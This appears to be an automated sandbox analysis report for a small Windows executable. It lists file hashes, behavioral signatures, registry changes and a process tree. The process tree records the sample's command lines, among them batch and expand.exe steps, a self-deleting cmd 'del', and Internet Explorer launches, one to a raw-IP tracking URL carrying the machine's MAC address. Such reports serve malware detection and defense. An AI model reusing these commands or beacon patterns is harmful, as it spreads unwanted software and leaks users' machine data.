Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
203s -
max time network
211s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
01/12/2022, 06:56
Static task
static1
Behavioral task
behavioral1
Sample
04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe
Resource
win10v2004-20221111-en
General
-
Target
04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe
-
Size
38KB
-
MD5
5c562d1687f6c8bec635c79516dc46b0
-
SHA1
46c063902191f87129420fc59434e100b1618eb6
-
SHA256
04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7
-
SHA512
e143ee9cf05ba522f5220a363ed77664a8815f91a12d014f332d945553d9745ead51b854aaefd5f44bf31c8347b419feaba62195b2a7efc43d90392f14b06932
-
SSDEEP
768:zn3ZTZaMKHOcgfThJlKK0gob24ODM27dMxoD0l8r11c:zpkMKFgQK0gH4O4odRD0M1W
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 936 ins2B36.tmp -
Deletes itself 1 IoCs
pid Process 592 cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 984 cmd.exe 984 cmd.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Adobe\info2010.dat 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\fxsst.dll 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8EA9C500-7309-11ED-91E9-EEBA1A0FFCD1} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8EA99DF0-7309-11ED-91E9-EEBA1A0FFCD1} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8EA976E0-7309-11ED-91E9-EEBA1A0FFCD1} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeIncBasePriorityPrivilege 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 928 iexplore.exe 1532 iexplore.exe 480 iexplore.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 1532 iexplore.exe 1532 iexplore.exe 928 iexplore.exe 928 iexplore.exe 480 iexplore.exe 480 iexplore.exe 892 IEXPLORE.EXE 892 IEXPLORE.EXE 336 IEXPLORE.EXE 336 IEXPLORE.EXE 1352 IEXPLORE.EXE 1352 IEXPLORE.EXE 336 IEXPLORE.EXE 336 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2024 wrote to memory of 984 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 28 PID 2024 wrote to memory of 984 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 28 PID 2024 wrote to memory of 984 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 28 PID 2024 wrote to memory of 984 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 28 PID 2024 wrote to memory of 520 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 30 PID 2024 wrote to memory of 520 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 30 PID 2024 wrote to memory of 520 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 30 PID 2024 wrote to memory of 520 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 30 PID 2024 wrote to memory of 1696 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 33 PID 2024 wrote to memory of 1696 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 33 PID 2024 wrote to memory of 1696 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 33 PID 2024 wrote to memory of 1696 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 33 PID 1696 wrote to memory of 1776 1696 cmd.exe 35 PID 1696 wrote to memory of 1776 1696 cmd.exe 35 PID 1696 wrote to memory of 1776 1696 cmd.exe 35 PID 1696 wrote to memory of 1776 1696 cmd.exe 35 PID 520 wrote to memory of 1112 520 cmd.exe 34 PID 520 wrote to memory of 1112 520 cmd.exe 34 PID 520 wrote to memory of 1112 520 cmd.exe 34 PID 520 wrote to memory of 1112 520 cmd.exe 34 PID 984 wrote to memory of 936 984 cmd.exe 36 PID 984 wrote to memory of 936 984 cmd.exe 36 PID 984 wrote to memory of 936 984 cmd.exe 36 PID 984 wrote to memory of 936 984 cmd.exe 36 PID 2024 wrote to memory of 928 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 37 PID 2024 wrote to memory of 928 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 37 PID 2024 wrote to memory of 928 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 37 PID 2024 wrote to memory of 928 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 37 PID 2024 wrote to memory of 1532 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 38 PID 2024 wrote to memory of 1532 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 38 PID 2024 wrote to memory of 1532 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 38 PID 2024 wrote to memory of 1532 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 38 PID 2024 wrote to memory of 480 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 39 PID 2024 wrote to memory of 480 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 39 PID 2024 wrote to memory of 480 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 39 PID 2024 wrote to memory of 480 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 39 PID 2024 wrote to memory of 592 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 40 PID 2024 wrote to memory of 592 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 40 PID 2024 wrote to memory of 592 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 40 PID 2024 wrote to memory of 592 2024 04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe 40 PID 1532 wrote to memory of 892 1532 iexplore.exe 44 PID 1532 wrote to memory of 892 1532 iexplore.exe 44 PID 1532 wrote to memory of 892 1532 iexplore.exe 44 PID 1532 wrote to memory of 892 1532 iexplore.exe 44 PID 480 wrote to memory of 1352 480 iexplore.exe 45 PID 928 wrote to memory of 336 928 iexplore.exe 46 PID 480 wrote to memory of 1352 480 iexplore.exe 45 PID 480 wrote to memory of 1352 480 iexplore.exe 45 PID 480 wrote to memory of 1352 480 iexplore.exe 45 PID 928 wrote to memory of 336 928 iexplore.exe 46 PID 928 wrote to memory of 336 928 iexplore.exe 46 PID 928 wrote to memory of 336 928 iexplore.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe"C:\Users\Admin\AppData\Local\Temp\04dcf9abfda8ec71568796216036dedac02d3e98531a70e089b05e030af1fae7.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\run_dws_file.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Users\Admin\AppData\Local\Temp\ins2B36.tmpC:\Users\Admin\AppData\Local\Temp\ins2B36.tmp accmp_config.tmp3⤵
- Executes dropped EXE
PID:936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_favurl_cab.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\expand.exeexpand.exe "C:\Users\Admin\AppData\Local\Temp\favorites_url.cab" -F:*.* "C:\Users\Admin\Favorites"3⤵
- Drops file in Windows directory
PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_deskurl_cab.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\expand.exeexpand.exe "C:\Users\Admin\AppData\Local\Temp\desktop_url.cab" -F:*.* "C:\Users\Admin\Desktop"3⤵
- Drops file in Windows directory
PID:1776
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://121.14.155.219:9091/report3.ashx?m=EE-BA-1A-0F-FC-D1&mid=21663&tid=1&d=9ff95a19731d2e4ff32f6f293d4e33b8&uid=13729&t=2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:928 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:336
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://tc.58816.com/2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1532 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:892
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.38522.com/bhy.html?popup2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:480 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\04DCF9~1.EXE > nul2⤵
- Deletes itself
PID:592
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8EA976E0-7309-11ED-91E9-EEBA1A0FFCD1}.dat
Filesize3KB
MD5f5ff9d4d78a523f46eec32125e0db599
SHA1092ca9c81bb448074899327cf95e23b83bba21ca
SHA256cbe5a09a15e3f264721b176ff75a4a631e958322cbaef9bec5babb7ec6cc3a12
SHA512d408c95f957a7d480380aa7e70ca700c88680e4ad929e51eed06a4b6ebc85d2c5277dacaf062a0b9f9598d67635fc22acac3078a30412803a78c850c55914caa
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8EA976E0-7309-11ED-91E9-EEBA1A0FFCD1}.dat
Filesize5KB
MD53660b0a583f14a8d50341781b469dbd2
SHA1bcf2f6c4578a175996d5630771b4890fdeeae374
SHA256bce48ec911d3cf211b9f5ec0aae9dc5e0373aa8a7b9bd6837a559d5eee169111
SHA5129ae8197e48a7e9b9c3ff06d69d5be41e7a4180ae3142c8daf31653985d9e737c33a3b7650fbdea4eb1994c5801f2bea07f08d697669ae5f40f3bbecf06c829df
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8EA9C500-7309-11ED-91E9-EEBA1A0FFCD1}.dat
Filesize3KB
MD5ef2e93888fc8dd91353f6ef35f7a0df3
SHA172480f81b15bcbaff07db6629461b10b374f4626
SHA256e23bb43b6111df58ee5d1e36dc402e33172785f89e89625d0838bb4137f2cb07
SHA51277fc9322f9201f01464a87f60a731dbcae4bf8c691cfb5a8570d0868717a0c2f9bb8c5ecf5d73545bdb0a1a5ade8685ce78fb20452334acb5edc4eb606cfe256
-
Filesize
779B
MD5264e1664e26196fd42d2da623098c343
SHA1482fbd971bf2f5b00ec06983189daf5e8fb530cc
SHA25689e4256ffc8d947f2b361d2b8e59857bb1c49d042d290c7dd4ebd5d41b7a082a
SHA512fbdbda204363a89dacdf0e86f5b71b5dc4c2960e4b970be8c24c76d633cfc1368f9cece62537ef83a36040282fcac4d0676cec2e8a7252fcfd439357d2878dda
-
Filesize
122.8MB
MD5cf56ca10e58131280ce62b7d03160886
SHA133e82bb70a8ec343449e910cd2f226dcf8de3a4e
SHA256858f047abca8f0576dbf388d2acaf47383fe1e66436f3d327307655aace31140
SHA51282b607109851fbc6b1da0bb49b7cb1c7deac68a6ea3c070b4207dd2c5143b42224dacc5df961acf55ddf4e1acba4755c8adfee044052f556c8eee46cb72629f3
-
Filesize
122.8MB
MD5cf56ca10e58131280ce62b7d03160886
SHA133e82bb70a8ec343449e910cd2f226dcf8de3a4e
SHA256858f047abca8f0576dbf388d2acaf47383fe1e66436f3d327307655aace31140
SHA51282b607109851fbc6b1da0bb49b7cb1c7deac68a6ea3c070b4207dd2c5143b42224dacc5df961acf55ddf4e1acba4755c8adfee044052f556c8eee46cb72629f3
-
Filesize
62B
MD5ec036d076a304f84d0afc9900181700c
SHA1fcaa924491d12eb9711bb88e10546de693ef20a2
SHA256078a3dedf1378f43ff4fb11bd009a63ee5c1eda9c2b9fca99908f83a54e4fb6a
SHA5122b3b4bada4d4417e7e014aa4f841284908ab11a1489a7fc1a49aa036a741f5b9a4fc0c991a0e48f2073d111d5e0f44880bdac208e41e71e04603d158543e9c4b
-
Filesize
94B
MD5d5fc3a9ec15a6302543438928c29e284
SHA1fd4199e543f683a8830a88f8ac0d0f001952b506
SHA256b2160315eb2f3bcb2e7601e0ce7fbb4ed72094b891d3db3b5119b07eeccc568d
SHA5124d0378480f1e7d5bee5cf8f8cd3495745c05408785ab687b92be739cd64c077f0e3ee26d6d96e27eb6e2c3dec5f39a2766c45854dc2d6a5b6defc672aeafa0f9
-
Filesize
98B
MD58663de6fce9208b795dc913d1a6a3f5b
SHA1882193f208cf012eaf22eeaa4fef3b67e7c67c15
SHA2562909ea8555f2fc19097c1070a1da8fcfd6dc6886aa1d99d7e0c05e53feeb5b61
SHA5129381063e0f85e874be54ae22675393b82c6ab54b223090148e4acbeff6f22393c96c90b83d6538461b695528af01d1f1231cf5dc719f07d6168386974b490688
-
Filesize
475B
MD57435d786e086d63639c02a3f39cecf84
SHA1a4d70109c0099e46e2cb17c92c1eb901b0744d46
SHA256376c35bd15ab9fb651cec5008e8ad5b5b894a5219a1f887199971a0c5a5c2598
SHA5123db60a0722b302bf48725e9cf78b2683e32ffd65a6f7bebb218eb0e0d2db1922b64678636013d9bf83368e5f5f64794678a9f657897bba541f2749b71da09edc
-
Filesize
425B
MD5da68bc3b7c3525670a04366bc55629f5
SHA115fda47ecfead7db8f7aee6ca7570138ba7f1b71
SHA25673f3605192b676c92649034768378909a19d13883a7ea6f8ba1b096c78ffadb5
SHA5126fee416affcb6a74621479697bca6f14f5429b00de3aa595abe3c60c6b2e094877b59f8783bbe7bdd567fa565d0630bb02def5603f8f0ea92fe8f2c3ac5383c0
-
Filesize
122.8MB
MD5cf56ca10e58131280ce62b7d03160886
SHA133e82bb70a8ec343449e910cd2f226dcf8de3a4e
SHA256858f047abca8f0576dbf388d2acaf47383fe1e66436f3d327307655aace31140
SHA51282b607109851fbc6b1da0bb49b7cb1c7deac68a6ea3c070b4207dd2c5143b42224dacc5df961acf55ddf4e1acba4755c8adfee044052f556c8eee46cb72629f3
-
Filesize
122.8MB
MD5cf56ca10e58131280ce62b7d03160886
SHA133e82bb70a8ec343449e910cd2f226dcf8de3a4e
SHA256858f047abca8f0576dbf388d2acaf47383fe1e66436f3d327307655aace31140
SHA51282b607109851fbc6b1da0bb49b7cb1c7deac68a6ea3c070b4207dd2c5143b42224dacc5df961acf55ddf4e1acba4755c8adfee044052f556c8eee46cb72629f3